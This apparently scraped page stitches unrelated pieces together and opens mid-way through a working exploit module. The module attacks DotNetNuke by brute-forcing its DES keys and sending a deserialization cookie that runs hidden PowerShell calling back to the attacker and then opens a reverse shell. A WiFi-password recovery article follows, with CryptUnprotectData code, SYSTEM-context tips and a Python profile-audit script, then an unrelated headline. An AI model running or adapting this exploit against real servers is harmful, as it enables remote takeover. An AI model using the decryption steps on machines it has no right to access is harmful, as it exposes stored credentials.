      105, 110, 103, 44, 32, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 8, 0, 0, 0, 10, 1, 10, 0, 0, 0, 9, 0, 0, 0, 6, 22, 0, 0, 0, 7, 67, 111, 109, 112, 97, 114, 101, 9, 12, 0, 0, 0, 6, 24, 0, 0, 0, 13, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 6, 25, 0, 0, 0, 43, 73, 110, 116, 51, 50, 32, 67, 111, 109, 112, 97, 114, 101, 40, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 6, 26, 0, 0, 0, 50, 83, 121, 115, 116, 101, 109, 46, 73, 110, 116, 51, 50, 32, 67, 111, 109, 112, 97, 114, 101, 40, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 8, 0, 0, 0, 10, 1, 16, 0, 0, 0, 8, 0, 0, 0, 6, 27, 0, 0, 0, 113, 83, 121, 115, 116, 101, 109, 46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 9, 12, 0, 0, 0, 10, 9, 12, 0, 0, 0, 9, 24, 0, 0, 0, 9, 22, 0, 0, 0, 10, 11
    ]

    @cr_regex = /(?<=Copyright \(c\) 2002-)(\d{4})/

    # ==================
    # v9.1.1+ VARIABLES
    # ==================
    @key_charset = "02468ABDF"
    @verification_codes = []
    @iv_regex = /[0-9A-F]{8}/

    # Known plaintext
    @kpt = ""

    # Encryption objects
    @decryptor = OpenSSL::Cipher.new('des')
    @decryptor.decrypt
    @encryptor = OpenSSL::Cipher.new('des')
    @encryptor.encrypt

    # final passphrase (key + iv) to use for payload (v9.1.1+)
    @passphrase = ""

    # ==================
    # v9.2.0+ VARIABLES
    # ==================
    # Session token needed for exploitation (v9.2.0+)
    @session_token = ""

    # ==================
    # v9.2.2+ VARIABLES
    # ==================
    # User ID format (v9.2.2+)
    # Number of characters of user ID available in plaintext
    # is equal to the length of a GUID (no spaces or dashes)
    # minus (blocksize - known plaintext length).
    @user_id_pt_length = 32 - (8 - @kpt.length)
    @user_id_regex = /[0-9a-f]{#{@user_id_pt_length}}/

    # Plaintext found from decryption (v9.2.2+)
    @found_pt = ""

    @iv_charset = "0123456789abcdef"

    # Possible IVs used to encrypt verification codes (v9.2.2+)
    @possible_ivs = Set.new([])

    # Possible keys used to encrypt verification codes (v9.2.2+)
    @possible_keys = Set.new([])

    # passphrases (key + iv) values to use for payload encryption (v9.2.2+)
    @passphrases = []

    # char sets to use when generating possible base keys
    @unchanged = Set.new([65, 70])
  end

  def decode_verification(code)
    # Decode verification code based on DNN format
    return String.new(
      Rex::Text.decode_base64(
        code.chomp.gsub(".", "+").gsub("-", "/").gsub("_", "=")
      )
    )
  end

  # ==============
  # Main function
  # ==============
  def exploit
    return unless check == Exploit::CheckCode::Appears

    @encrypted = datastore['ENCRYPTED']
    verification_code = datastore['VERIFICATION_CODE']
    if File.file?(verification_code)
      File.readlines(verification_code).each do |code|
        @verification_codes.push(decode_verification(code))
      end
    else
      @verification_codes.push(decode_verification(verification_code))
    end

    @kpt = datastore['VERIFICATION_PLAIN']
    @session_token = datastore['SESSION_TOKEN']
    @dry_run = datastore['DryRun']
    key = datastore['KEY']
    iv = datastore['IV']

    if target['ReqEncrypt'] && @encrypted == false
      print_warning("Target requires encrypted payload. Exploit may not succeed.")
    end

    if @encrypted
      # Requires either supplied key and IV, or verification code and plaintext
      if (!key.blank? && !iv.blank?)
        @passphrase = key + iv
        # Key and IV were supplied, don't try and decrypt.
        @try_decrypt = false
      elsif (!@verification_codes.empty? && !@kpt.blank?)
        @try_decrypt = true
      else
        fail_with(Failure::BadConfig, "You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV).")
      end
    end

    if target['ReqSession']
      if @session_token.blank?
        fail_with(Failure::BadConfig, "Target requires a valid SESSION_TOKEN for exploitation.")
      end
    end

    if @encrypted && @try_decrypt
      # Set IV for decryption as the known plaintext, manually
      # apply PKCS padding (N bytes of N), and disable padding on the decryptor to increase speed.
      # For v9.1.1 - v9.2.1 this will find the valid KEY and IV value in real time.
      # For v9.2.2+ it will find an initial base key faster than if padding were enabled.
      f8_plain = @kpt[0, 8]
      c_iv = f8_plain.unpack("C*") + [8 - f8_plain.length] * (8 - f8_plain.length)
      @decryptor.iv = String.new(c_iv.pack("C*"))
      @decryptor.padding = 0

      key = find_key(@verification_codes[0])
      if key.blank?
        return
      end

      if @target_idx == 4
        # target is v9.2.2+, requires base64 generated key and IV values.
        generate_base_keys(0, key.each_byte.to_a, "")
        vprint_status("Generated #{@possible_keys.size} possible base KEY values from #{key}")

        # re-enable padding here as it doesn't have the
        # same performance impact when trying to find possible IV values.
        @decryptor.padding = 1

        print_warning("Finding possible base IVs. This may take a few minutes...")
        start = Time.now
        find_ivs(@verification_codes, key)
        elapsed = Time.now - start
        vprint_status(
          format(
            "Found %<n_ivs>d potential Base IV values using %<n_codes>d "\
            "verification codes in %<e_time>.2f seconds.",
            n_ivs: @possible_ivs.size,
            n_codes: @verification_codes.size,
            e_time: elapsed.to_s
          )
        )
        generate_payload_passphrases
        vprint_status(format("Generated %<n_phrases>d possible base64 KEY and IV combinations.", n_phrases: @passphrases.size))
      end

      if @passphrase.blank?
        # test all generated passphrases by
        # sending an exploit payload to the target
        # that will callback to an HTTP listener
        # with the index of the passphrase that worked.

        # set SRVHOST as LHOST value for HTTPServer mixin
        datastore['SRVHOST'] = datastore['LHOST']
        print_warning("Trying all possible KEY and IV combinations...")
        print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...")
        start_service
        vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
        test_passphrases

        # If no working passphrase has been found,
        # wait to allow the chance for the last one to callback.
        if @passphrase.empty? && !@dry_run
          sleep(wfs_delay)
        end

        if service
          stop_service
        end

        print "\r\n"
        if !@passphrase.empty?
          print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..-1]} found")
        end
      end
    end

    send_exploit_payload
  end

  # =====================
  # For the check command
  # =====================
  def check
    if target.name == 'Automatic'
      select_target
    end

    @target_idx = Integer(datastore['TARGET'])
    if @target_idx == 0
      fail_with(Failure::NoTarget, 'No valid target found or specified.')
    end

    # Check if 404 page is custom or not.
    # Vulnerability requires custom 404 handling (enabled by default).
    uri = normalize_uri(target_uri.path)
    print_status("Checking for custom error page at: #{uri} ...")
    res = send_request_cgi(
      'uri' => uri
    )
    # No response at all (connection refused, timeout): nothing to judge.
    return Exploit::CheckCode::Unknown unless res

    if res.code == 404 && !res.body.include?('Server Error') && res.to_s.length > 1600
      print_good("Custom error page detected.")
    else
      print_error("IIS Error Page detected.")
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Appears
  end

  # ===========================
  # Auto-select target version
  # ===========================
  def select_target
    print_status("Trying to determine DNN Version...")

    # Check for copyright version in /Documentation/license.txt
    uri = %r{^(.*[\\\/])}.match(target_uri.path)[0]
    vprint_status("Checking version at #{normalize_uri(uri + 'Documentation', 'License.txt')} ...")
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(uri + 'Documentation', 'License.txt')
    )

    year = -1
    if res && res.code == 200
      # License page found, get latest copyright year.
      matches = @cr_regex.match(res.body)
      if matches
        year = matches[0].to_i
      end
    else
      vprint_status("Checking version at #{uri} ...")
      res = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(uri)
      )
      if res && res.code == 200
        # Check if copyright info is in page HTML.
        matches = @cr_regex.match(res.body)
        if matches
          year = matches[0].to_i
        end
      end
    end

    if year >= 2018
      print_warning(
        %q(DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN. Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2. Try setting target 4 and supply a file of verification codes or specify valid Key and IV values.)
      )
      datastore['TARGET'] = 3
    elsif year == 2017
      print_warning('DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED')
      datastore['TARGET'] = 2
    elsif year < 2017 && year > 2008
      print_good("DNN Version Found: v5.1.0 - v9.0.1")
      datastore['TARGET'] = 1
    elsif year == 2008
      print_warning("DNN Version is either v5.0.0 (vulnerable) or 4.9.x (not vulnerable).")
      datastore['TARGET'] = 1
    else
      print_warning("Could not determine DNN version. Target may still be vulnerable. Manually set the Target value")
    end
  end

  # ==============================
  # Known plaintext attack to
  # brute-force the encryption key
  # ==============================
  def find_key(cipher_text)
    print_status("Finding Key...")

    # Counter
    total_keys = @key_charset.length**8
    i = 1

    # Set start time
    start = Time.now

    # First char
    @key_charset.each_byte do |a|
      key = a.chr
      # 2
      @key_charset.each_byte do |b|
        key[1] = b.chr
        # 3
        @key_charset.each_byte do |c|
          key[2] = c.chr
          # 4
          @key_charset.each_byte do |d|
            key[3] = d.chr
            # 5
            @key_charset.each_byte do |e|
              key[4] = e.chr
              # 6
              @key_charset.each_byte do |f|
                key[5] = f.chr
                # 7
                @key_charset.each_byte do |g|
                  key[6] = g.chr
                  # 8
                  @key_charset.each_byte do |h|
                    key[7] = h.chr
                    if decrypt_data_and_iv(@decryptor, cipher_text, String.new(key))
                      elapsed = Time.now - start
                      print_search_status(i, elapsed, total_keys)
                      print_line
                      if @target_idx == 4
                        print_good("Possible Base Key Value Found: " + key)
                      else
                        print_good("KEY Found: " + key)
                        print_good("IV Found: " + @passphrase[8..-1])
                      end
                      vprint_status(format("Total number of Keys tried: %<n_tried>d", n_tried: i))
                      vprint_status(format("Time to crack: %<c_time>.3f seconds", c_time: elapsed.to_s))
                      return String.new(key)
                    end

                    # Print timing info every 5 million attempts
                    if i % 5000000 == 0
                      print_search_status(i, Time.now - start, total_keys)
                    end
                    i += 1
                  end
                end
              end
            end
          end
        end
      end
    end

    elapsed = Time.now - start
    print_search_status(i, elapsed, total_keys)
    print_line
    print_error("Key not found")
    vprint_status(format("Total number of Keys tried: %<n_tried>d", n_tried: i))
    vprint_status(format("Time run: %<r_time>.3f seconds", r_time: elapsed.to_s))
    return nil
  end

  # ==================================
  # Attempt to decrypt a ciphertext
  # and obtain the IV at the same time
  # ==================================
  def decrypt_data_and_iv(cipher, cipher_text, key)
    cipher.key = key
    begin
      plaintext = cipher.update(cipher_text) + cipher.final
      if @target_idx == 4
        # Target is v9.2.2+
        user_id =
plaintext[8, @user_id_pt_length] if @user_id_regex.match(user_id) return true end return false end # This should only execute if the version is 9.1.1 - 9.2.1 iv = plaintext[0, 8] if !@iv_regex.match(iv) return false end # Build encryption passphrase as DNN does. @passphrase = key + iv # Encrypt the plaintext value using the discovered key and IV # and compare with the initial ciphertext if cipher_text == encrypt_data(@encryptor, @kpt, @passphrase) @passphrases.push(String.new(key + iv)) return true end rescue StandardError # Ignore decryption errors to allow execution to continue return false end return false end def print_search_status(num_tries, elapsed, max_tries) msg = format("Searching at %<s_rate>.3f keys/s ...... %<p_complete>.2f%% of keyspace complete.", s_rate: num_tries / elapsed, p_complete: (num_tries / max_tries.to_f) * 100) print("\r%bld%blu[*]%clr #{msg}") end # =========================== # Encrypt data using the same # pattern that DNN uses. # =========================== def encrypt_data(cipher, message, passphrase) cipher.key = passphrase[0, 8] cipher.iv = passphrase[8, 8] return cipher.update(message) + cipher.final end # =============================================== # Generate all possible base key values # used to create the final passphrase in v9.2.2+. # DES weakness allows multiple bytes to be # interpreted as the same value. # =============================================== def generate_base_keys(pos, from_key, new_key) if !@unchanged.include? 
from_key[pos] if from_key[pos] % 2 == 0 new_key[pos] = (from_key[pos] + 1).chr else new_key[pos] = (from_key[pos] - 1).chr end if new_key.length == 8 @possible_keys.add(String.new(new_key)) # also add key with original value new_key[pos] = (from_key[pos]).chr @possible_keys.add(String.new(new_key)) else generate_base_keys(pos + 1, from_key, String.new(new_key)) # also generate keys with original value new_key[pos] = (from_key[pos]).chr generate_base_keys(pos + 1, from_key, String.new(new_key)) end else new_key[pos] = (from_key[pos]).chr if new_key.length == 8 @possible_keys.add(String.new(new_key)) else generate_base_keys(pos + 1, from_key, String.new(new_key)) end end end # ============================================== # Find all possible base IV values # used to create the final Encryption passphrase # ============================================== def find_ivs(cipher_texts, key) num_chars = 8 - @kpt.length f8regex = /#{@kpt}[0-9a-f]{#{num_chars}}/ @decryptor.key = key found_pt = @decryptor.update(cipher_texts[0]) + @decryptor.final # Find all possible IVs for the first ciphertext brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..-1]) # Reduce IV set by testing against other ciphertexts cipher_texts.drop(1).each do |cipher_text| @possible_ivs.each do |iv| @decryptor.iv = iv pt = @decryptor.update(cipher_text) + @decryptor.final if !f8regex.match(pt[0, 8]) @possible_ivs.delete(iv) end end end end # ========================================== # A recursive function to find all # possible valid IV values using brute-force # ========================================== def brute_force_ivs(pt_prefix, num_chars_needed, cipher_text, key, found_pt) charset = "0123456789abcdef" if num_chars_needed == 0 @decryptor.key = key @decryptor.iv = pt_prefix pt = @decryptor.update(cipher_text) + @decryptor.final iv = pt[0, 8] if @iv_regex.match(iv) pt = pt_prefix + found_pt if encrypt_data(@encryptor, pt, key + iv) == cipher_text 
@possible_ivs.add(String.new(iv)) end end return end charset.length.times do |i| brute_force_ivs(String.new(pt_prefix + charset[i]), num_chars_needed - 1, cipher_text, key, found_pt) end end # ======================================== # Generate all possible payload encryption # passphrases for a v9.2.2+ target # ======================================== def generate_payload_passphrases phrases = Set.new(@passphrases) @possible_keys.each do |key| @possible_ivs.each do |iv| phrase = Rex::Text.encode_base64( encrypt_data(@encryptor, key + iv, key + iv) ) phrases.add(String.new(phrase[0, 16])) end end @passphrases = phrases.to_a end # =========================================== # Test all generated passphrases by initializing # an HTTP server to listen for a callback that # contains the index of the successful passphrase. # =========================================== def test_passphrases for i in 0..@passphrases.size - 1 # Stop sending if we've found the passphrase if !@passphrase.empty? break end msg = format("Trying KEY and IV combination %<current>d of %<total>d...", current: i + 1, total: @passphrases.size) print("\r%bld%blu[*]%clr #{msg}") url = "#{get_uri}?#{get_resource.delete('/')}=#{i}" payload = create_request_payload(url) cookie = create_cookie(payload) # Encrypt cookie value enc_cookie = Rex::Text.encode_base64( encrypt_data(@encryptor, cookie, @passphrases[i]) ) if @dry_run print_line print_warning("DryRun enabled. No exploit payloads have been sent to the target.") print_warning("Printing first HTTP callback cookie payload encrypted with KEY: #{@passphrases[i][0, 8]} and IV: #{@passphrases[i][8, 8]}...") print_line(enc_cookie) break end execute_command(enc_cookie, host: datastore['RHOST']) end end # =============================== # Request handler for HTTP server. 
# ============================== def on_request_uri(cli, request) # Send 404 to prevent scanner detection send_not_found(cli) # Get found index - should be the only query string parameter if request.qstring.size == 1 && request.qstring[get_resource.delete('/').to_s] index = request.qstring[get_resource.delete('/').to_s].to_i @passphrase = String.new(@passphrases[index]) end end # ============================================== # Create payload to callback to the HTTP server. # Note: This technically exploits the # vulnerability, but provides a way to determine # the valid passphrase needed to exploit again. # ============================================== def create_request_payload(url) psh_cmd = "/b /c start /b /min powershell.exe -nop -w hidden -noni -Command \"Invoke-WebRequest '#{url}'\"" psh_cmd_bytes = psh_cmd.bytes.to_a cmd_size_bytes = write_encoded_int(psh_cmd.length) # Package payload into serialized object payload_object = @osf_wrapper_start + cmd_size_bytes + psh_cmd_bytes + @osf_wrapper_end object_size = write_encoded_int(payload_object.length) # Create the final seralized ObjectStateFormatter payload final_payload = @osf_header + object_size + payload_object b64_payload = Rex::Text.encode_base64(final_payload.pack("C*")) return b64_payload end # ============================================= # Reproduce the WriteEncoded method in # the native .NET ObjectStateFormatter.cs file. 
# ============================================= def write_encoded_int(value) enc = [] while (value >= 0x80) v = value | 0x80 enc.push([v].pack("V")[0].unpack1("C*")) value >>= 7 end enc.push([value].pack("V")[0].unpack1("C*")) return enc end # ================================= # Creates the payload cookie # using the specified payload # ================================= def create_cookie(payload) cookie = "<profile>"\ "<item key=\"k\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, "\ "System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],"\ "[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, "\ "Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, "\ "Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\">"\ "<ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\ "<ProjectedProperty0>"\ "<MethodName>Deserialize</MethodName>"\ "<MethodParameters>"\ "<anyType xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" "\ "xmlns:d=\"http://www.w3.org/2001/XMLSchema\" i:type=\"d:string\" "\ ">#{payload}</anyType>"\ "</MethodParameters>"\ "<ObjectInstance xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" "\ "i:type=\"ObjectStateFormatter\" />"\ "</ProjectedProperty0>"\ "</ExpandedWrapperOfObjectStateFormatterObjectDataProvider>"\ "</item>"\ "</profile>" return cookie end # ========================================= # Send the payload to the target server. 
# ========================================= def execute_command(cookie_payload, opts = { dnn_host: host, dnn_port: port }) uri = normalize_uri(target_uri.path) res = send_request_cgi( 'uri' => uri, 'cookie' => ".DOTNETNUKE=#{@session_token};DNNPersonalization=#{cookie_payload};" ) if !res fail_with(Failure::Unreachable, "#{opts[:host]} - target unreachable.") elsif res.code == 404 return true elsif res.code == 400 fail_with(Failure::BadConfig, "#{opts[:host]} - payload resulted in a bad request - #{res.body}") else fail_with(Failure::Unknown, "#{opts[:host]} - Something went wrong- #{res.body}") end end # ====================================== # Create and send final exploit payload # to obtain a reverse shell. # ====================================== def send_exploit_payload cmd_payload = create_payload cookie_payload = create_cookie(cmd_payload) if @encrypted if @passphrase.blank? print_error("Target requires encrypted payload, but a passphrase was not found or specified.") return end cookie_payload = Rex::Text.encode_base64( encrypt_data(@encryptor, cookie_payload, @passphrase) ) end if @dry_run print_warning("DryRun enabled. No exploit payloads have been sent to the target.") print_warning("Printing exploit cookie payload...") print_line(cookie_payload) return end # Set up the payload handlers payload_instance.setup_handler # Start the payload handler payload_instance.start_handler print_status("Sending Exploit Payload to: #{normalize_uri(target_uri.path)} ...") execute_command(cookie_payload, host: datastore['RHOST']) end # =================================== # Create final exploit paylod based on # supplied payload options. 
# =================================== def create_payload # Create payload psh_cmd = "/b /c start /b /min " + cmd_psh_payload( payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: false ) psh_cmd_bytes = psh_cmd.bytes.to_a cmd_size_bytes = write_encoded_int(psh_cmd.length) # Package payload into serialized object payload_object = @osf_wrapper_start + cmd_size_bytes + psh_cmd_bytes + @osf_wrapper_end object_size = write_encoded_int(payload_object.length) # Create the final seralized ObjectStateFormatter payload final_payload = @osf_header + object_size + payload_object b64_payload = Rex::Text.encode_base64(final_payload.pack("C*")) vprint_status("Payload Object Created.") return b64_payload end end Source
  7. Kev

    Useful stuff

  8. Introduction

    This research article throws light on the internal password storage and encryption mechanism used for storing WiFi account passwords. It explains where the WiFi passwords are stored on different platforms and how to decrypt them using a practical code sample. Note that it deals only with WiFi settings stored by the built-in Windows Wireless Configuration Manager. It also covers only Vista and higher operating systems, though it may touch upon some aspects of Windows XP.

    WiFi Configuration

    All Windows systems have a built-in 'Wireless Configuration Manager' which helps in managing your wireless connections. Here are the simple steps involved in configuring your WiFi setup:

    1. From Control Panel, click on 'Network & Internet'.
    2. Next click on 'Network & Sharing Center'. You will see all your network connections.
    3. Now from the left panel click on 'Manage Wireless Networks'. This will launch the 'Wireless Configuration' screen showing all your configured WiFi connections.
    4. You can click on 'ADD' and then click on 'Manually Create Network Profile' to create new WiFi connections.

    Below is the screenshot showing the 'Add Wireless Network' dialog.

    WiFi Password Location

    Before we proceed, we need to know where these wireless settings are stored on the system. Depending on the platform, the 'Wireless Configuration Manager' uses different techniques and different storage locations to store these wireless settings.

    For Windows XP/2003

    On XP, all the wireless settings are stored in the registry at the following location:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}

    Here each wireless device/interface is represented by a unique GUID {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}, and all the settings for this device are stored under this GUID within the value 'ActiveSettings'. The actual contents are encrypted using 'Windows Cryptography' functions [Reference 1].

    For Vista, Windows 7, Windows 8 & Windows 10

    From Vista onwards, the 'Wireless Configuration Manager' no longer uses the registry. Instead, all the wireless parameters, including SSID, authentication method and encrypted password, are stored in the following file:

    C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\{Random-GUID}.xml

    Here each wireless device is represented by its interface GUID {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}, and each set of wireless settings for this device is stored in an XML file with a random GUID as its name.

    WiFi Storage Mechanism

    All the information discussed henceforth applies only to Vista and higher operating systems. As we already know, each set of wireless settings is stored in an XML file. Here are the actual contents of one such file:

    <?xml version="1.0"?>
    <WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
      <name>SecurityXploded</name>
      <SSIDConfig>
        <SSID>
          <hex>536563757269747958706C6F646564</hex>
          <name>SecurityXploded</name>
        </SSID>
        <nonBroadcast>false</nonBroadcast>
      </SSIDConfig>
      <connectionType>ESS</connectionType>
      <connectionMode>auto</connectionMode>
      <autoSwitch>false</autoSwitch>
      <MSM>
        <security>
          <authEncryption>
            <authentication>WPAPSK</authentication>
            <encryption>AES</encryption>
            <useOneX>false</useOneX>
          </authEncryption>
          <sharedKey>
            <keyType>passPhrase</keyType>
            <protected>true</protected>
            <keyMaterial>01000000D08C9DDF0115D1118C7A00C0***TRUNCATED***DA88A2</keyMaterial>
          </sharedKey>
        </security>
      </MSM>
    </WLANProfile>

    Each wireless profile mainly stores information about the WiFi name, security settings such as authentication and encryption, and the encrypted password. In the above example, the WiFi network name, aka SSID, is 'SecurityXploded', which is stored in both ASCII and hex format. The next important things are authentication and encryption, which are stored within the <authEncryption> node. This wireless configuration uses WPA (WPAPSK) for authentication and AES for encryption.

    Now comes the most interesting thing, the 'WiFi Password', which is stored under the <sharedKey> node. Here the <protected> field indicates whether the password is encrypted or stored in clear text. If the <protected> field is true, the password is encrypted and can be found in the <keyMaterial> node, as in the above example.

    WiFi Password Encryption & Decryption

    If you are one of us who live in the crypto world then it does not take much time to decipher the encryption method used here. Clearly it uses 'Windows Cryptography' functions [Reference 1] to encrypt and decrypt the WiFi passwords. Here is the signature found at the beginning of the encrypted password:

    01000000D08C9DDF0115D1118C7A00C0

    To be more precise, the 'Wireless Configuration Manager' uses CryptProtectData to encrypt the wireless keys and passwords. Another notable thing is that it does not use any salt (optional entropy) or magic key for encryption. This makes decryption simple and straightforward using CryptUnprotectData, as shown in the example below.

    //
    // Wireless Key/Password Decryption Algorithm for Vista/Windows 7/Windows 8/Windows 10
    //
    #include <windows.h>
    #include <wincrypt.h>
    #include <stdio.h>
    #pragma comment(lib, "crypt32.lib")

    void DecryptWiFiPassword(BYTE *buffer, DWORD dwSizeBuffer)
    {
        DATA_BLOB DataIn;
        DATA_BLOB DataOut;

        // buffer holds the raw (hex-decoded) <keyMaterial> blob
        DataIn.pbData = buffer;
        DataIn.cbData = dwSizeBuffer;

        // No optional entropy was used at encryption time, so none is passed here
        if (CryptUnprotectData(&DataIn, NULL, NULL, NULL, NULL, 0, &DataOut))
        {
            // The decrypted data is not NUL-terminated, so print exactly cbData bytes
            printf("\n Wireless Key Password : %.*s", (int)DataOut.cbData, (char *)DataOut.pbData);
            LocalFree(DataOut.pbData);
        }
    }

    One catch here is that you can't just decrypt the password even though you are an administrator. To successfully decrypt the password, you have to perform the decryption operation under the SYSTEM context. There are many ways to execute code under the SYSTEM context; one of the popular ways is to inject the code via a remote thread [Reference 2] into a system process, LSASS.EXE. But this one is riskier, as any flaw in the code can bring down the entire system. A much safer way is to create a Windows service running as the System account and then execute the above decryption code from that service.
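    The profile format and the DPAPI signature described above can be turned into a small audit of the Wlansvc profile store. The following is an added example (not code from the article or from the WiFi Password Decryptor tool) that parses a WLANProfile XML, checks whether the shared key is a CryptProtectData blob, and flags profiles that keep the key in clear text or use weak link-layer security; the sample profile is constructed, and the function names, the default path handling and the filler bytes after the signature are assumptions.

```python
import os
import sys
import xml.etree.ElementTree as ET

# Namespace of the WLANProfile documents written by the Wireless Configuration Manager.
WLAN_NS = {"p": "http://www.microsoft.com/networking/WLAN/profile/v1"}

# Signature at the start of every CryptProtectData blob (the 16 bytes quoted in the article):
# DPAPI blob version 1 followed by the DPAPI provider GUID.
DPAPI_SIGNATURE = bytes.fromhex("01000000D08C9DDF0115D1118C7A00C0")

# Vista+ profile store from the article (assumption: used only when no path is given).
DEFAULT_PROFILE_DIR = r"C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces"

# Constructed sample profile modelled on the one in the article. The keyMaterial here is
# just the DPAPI signature plus filler bytes, not a real encrypted key.
SAMPLE_PROFILE = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>SecurityXploded</name>
  <SSIDConfig>
    <SSID>
      <hex>536563757269747958706C6F646564</hex>
      <name>SecurityXploded</name>
    </SSID>
    <nonBroadcast>false</nonBroadcast>
  </SSIDConfig>
  <connectionType>ESS</connectionType>
  <MSM>
    <security>
      <authEncryption>
        <authentication>WPAPSK</authentication>
        <encryption>AES</encryption>
        <useOneX>false</useOneX>
      </authEncryption>
      <sharedKey>
        <keyType>passPhrase</keyType>
        <protected>true</protected>
        <keyMaterial>01000000D08C9DDF0115D1118C7A00C0DEADBEEF</keyMaterial>
      </sharedKey>
    </security>
  </MSM>
</WLANProfile>
"""


def parse_profile(xml_text):
    """Extract the security-relevant fields of one WLANProfile document."""
    root = ET.fromstring(xml_text)

    def text(path):
        node = root.find(path, WLAN_NS)
        return node.text.strip() if node is not None and node.text else None

    ssid_hex = text("p:SSIDConfig/p:SSID/p:hex")
    return {
        "name": text("p:name"),
        # The SSID is stored twice; prefer the hex form, which survives non-ASCII names.
        "ssid": (bytes.fromhex(ssid_hex).decode("utf-8", "replace") if ssid_hex
                 else text("p:SSIDConfig/p:SSID/p:name")),
        "authentication": text("p:MSM/p:security/p:authEncryption/p:authentication"),
        "encryption": text("p:MSM/p:security/p:authEncryption/p:encryption"),
        "key_type": text("p:MSM/p:security/p:sharedKey/p:keyType"),
        "protected": text("p:MSM/p:security/p:sharedKey/p:protected") == "true",
        "key_material": text("p:MSM/p:security/p:sharedKey/p:keyMaterial"),
    }


def dpapi_blob(key_material_hex):
    """Hex-decode keyMaterial; return the bytes if they carry the DPAPI signature, else None."""
    try:
        blob = bytes.fromhex(key_material_hex or "")
    except ValueError:
        return None
    return blob if blob.startswith(DPAPI_SIGNATURE) else None


def audit_profile(profile):
    """Return the findings a defender would want for one parsed profile (empty list = fine)."""
    findings = []
    if profile["key_type"] is None:
        # Open network or 802.1X profile: no shared key to protect.
        return findings
    if not profile["protected"]:
        findings.append("shared key stored in clear text (protected=false)")
    elif dpapi_blob(profile["key_material"]) is None:
        findings.append("keyMaterial is not a CryptProtectData (DPAPI) blob")
    if profile["authentication"] in ("open", "shared") or profile["encryption"] in ("WEP", "none"):
        findings.append("weak link-layer security (%s/%s)"
                        % (profile["authentication"], profile["encryption"]))
    return findings


def audit_profile_store(root_dir):
    """Walk the Wlansvc profile store and yield (path, ssid, findings) for every profile XML."""
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8-sig") as fh:
                profile = parse_profile(fh.read())
            yield path, profile["ssid"], audit_profile(profile)


if __name__ == "__main__":
    # Reading the store needs an elevated prompt; decryption itself (not done here) needs SYSTEM.
    store = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_PROFILE_DIR
    for path, ssid, findings in audit_profile_store(store):
        print("%s  %-24s %s" % (path, ssid, "; ".join(findings) or "ok"))
```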
    Recover Wireless Passwords using WiFi Password Decryptor

    WiFi Password Decryptor is a free tool that automatically detects and decrypts wireless passwords stored on your system. It instantly recovers all the WiFi passwords and displays the various security settings (WEP/WPA/AES/TKIP etc.) along with the password in clear text. It works on both 32-bit and 64-bit platforms, from Vista up to the latest operating system, Windows 10.

    References

    [1] Windows Cryptography Functions
    [2] Remote Thread Execution in System Process using NtCreateThreadEx for Vista/Win7
  9. Industry-wide Deployment of STIR/SHAKEN Will Yield Substantial Benefits for American Consumers

